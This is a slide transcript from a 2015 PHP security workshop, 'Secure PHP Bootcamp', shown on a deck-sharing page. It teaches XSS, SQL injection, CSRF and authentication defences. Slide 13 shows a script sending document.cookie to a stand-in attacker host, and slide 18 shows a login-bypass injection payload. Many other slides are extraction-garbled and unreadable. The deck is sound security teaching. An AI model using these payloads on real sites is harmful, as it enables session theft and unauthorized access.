Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Secure PHP Bootcamp

Chris Cornutt
January 23, 2015
Technology
0
490

Secure PHP Bootcamp

Given at PHP Benelux 2015

Chris Cornutt

January 23, 2015
Tweet

More Decks by Chris Cornutt

See All by Chris Cornutt
Securing Legacy Applications
ccornutt
0
81
Pentesting for Developers
ccornutt
0
88
Securing Legacy Applications - Longhorn PHP 2018
ccornutt
1
140
Pieces of Auth
ccornutt
0
270
Securing Legacy Applications
ccornutt
0
270
Build Security In
ccornutt
0
140
Introduction to Slim 3
ccornutt
0
130
Securing Legacy Applications
ccornutt
0
32
PHP Security, Redfined
ccornutt
0
210

Other Decks in Technology

See All in Technology
CUEとKubernetesカスタムオペレータを用いた新しいネットワークコントローラをつくってみた
hrk091
1
300
💰年度末予算消化祭💰 Large Memory Instance で 画像分類してみた
__allllllllez__
0
120
インフラ技術基礎勉強会 開催概要
toru_kubota
0
190
ECSコスト削減のブレイクアウトセッションを聴いてきた話 / joining a breakout session on reducing costs with ECS
yayoi_dd
0
140
PCI DSS に準拠したシステム開発
yutadayo
0
320
日経電子版だけじゃない! 日経の新規Webメディアの開発 - NIKKEI Tech Talk #3
sztm
0
350
OCI DevOps 概要 / OCI DevOps overview
oracle4engineer
PRO
0
510
SSMパラメーターストアでクロススタック参照の罠を回避する
shuyakinjo
0
8k
Hatena Engineer Seminar #23 「チームとプロダクトを育てる Mackerel 開発合宿」
arthur1
0
650
目指せCoverage100%! AutoScale環境におけるSavings Plans購入戦略 / JAWS-UG_SRE_Coverage
taishin
0
530
私見「UNIXの考え方」/20230124-kameda-unix-phylosophy
opelab
1
180
5分でわかるファストドクターテクノロジーズ
fast_doctor
0
100

Featured

See All Featured
We Have a Design System, Now What?
morganepeng
37
6k
How to name files
jennybc
47
73k
Visualization
eitanlees
129
12k
Atom: Resistance is Futile
akmur
256
24k
Navigating Team Friction
lara
177
12k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
500
130k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
351
21k
KATA
mclloyd
12
9.7k
Build your cross-platform service in a week with App Engine
jlugia
221
17k
Building Your Own Lightsaber
phodgson
96
4.9k
Automating Front-end Workflow
addyosmani
1351
200k
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
318
19k

Transcript

  1. Secure PHP Development $ISJT$PSOVUU!FOZHNB

  2. https://jetbrains.com

  3. Goals #BTJDBQQTFDQSJODJQMFT 7VMOFSBCJMJUJFT&YQMPJUT )BOETPOFYQFSJFODF 5PPMT5FDIOJRVFT

  4. 1)1%FW :FBST "QQTFDGPDVTFE IUUQXFCTFDJP IUUQTFDVSJOHQIQDPN

  5. IUUQCJUMZPXBTQUPQ

  6. 5IFSF`T OPTVDIUIJOH BTTFDVSF

  7. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI"7VMOFSBCMF"QQMJDBUJPO

  8. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ5JNF PSIUUQOPUDITFDVSJOHQIQDPN

  9. None

  10. XSS: Cross Site Scripting

  11. *OKFDUJPOPGDPOUFOUJOUPUIFQBHF VTVBMMZ+BWBTDSJQU SFqFDUFEWTTUPSFE QPPSPVUQVUFTDBQJOH

  12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

  13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFTDSPTTPSJHJOQPMJDZPG

  14. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF5IJTJTPOMZGPSB)5.-DPOUFYU

  15. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF5IJTFYBNQMFSFRVJSFT5XJH

  16. SQLi: SQL Injection

  17. *OKFDUJPOTQFDJpDUP42-TUBUFNFOUT FYQPTFEBUB CZQBTTBVUI NFDIBOJTNT QPPSJOQVUpMUFSJOH

  18. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

  19. [email protected] [email protected]@[email protected] [email protected]@[email protected]

  20. [email protected] [email protected]@[email protected] [email protected]@[email protected] X

  21. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF5IJTFYBNQMFSFRVJSFT1%0TVQQPSU

  22. CSRF: Cross Site Request Forgery

  23. VOWBMJEBUFEGPSNTVCNJTTJPO POBMMTUBUFDIBOHFT XIBU`TUIFTPVSDF  TJNQMF SBOEPNJ[FE GPSFBDIGPSN

  24. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

  25. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

  26. Auth*: Authentication & Authorization

  27. EJSFDUPCKFDUSFGFSFODF "  EBUBBDDFTT EBOHFSPVTBDUJPOT QPPSVTFSNBOBHFNFOU

  28. QMBJOUFYUQBTTXPSET OPQBTTXPSEQPMJDZ PWFSMZDPNQMFYQBTTXPSET QBTTXPSEIJOUT

  29. None
  30. None

  31. And…

  32. 4FDVSJUZ.JTDPOpHVSBUJPO 4FOTJUJWF%BUB&YQPTVSF $PNQPOFOUTXJUI,OPXO7VMOFSBCJMJUJFT 6OWBMJEBUFE3FEJSFDUTBOE'PSXBSET

  33. 5IBU`TBMMGPMLT !FOZHNB !TFDVSJOHQIQ IUUQTFDVSJOHQIQDPN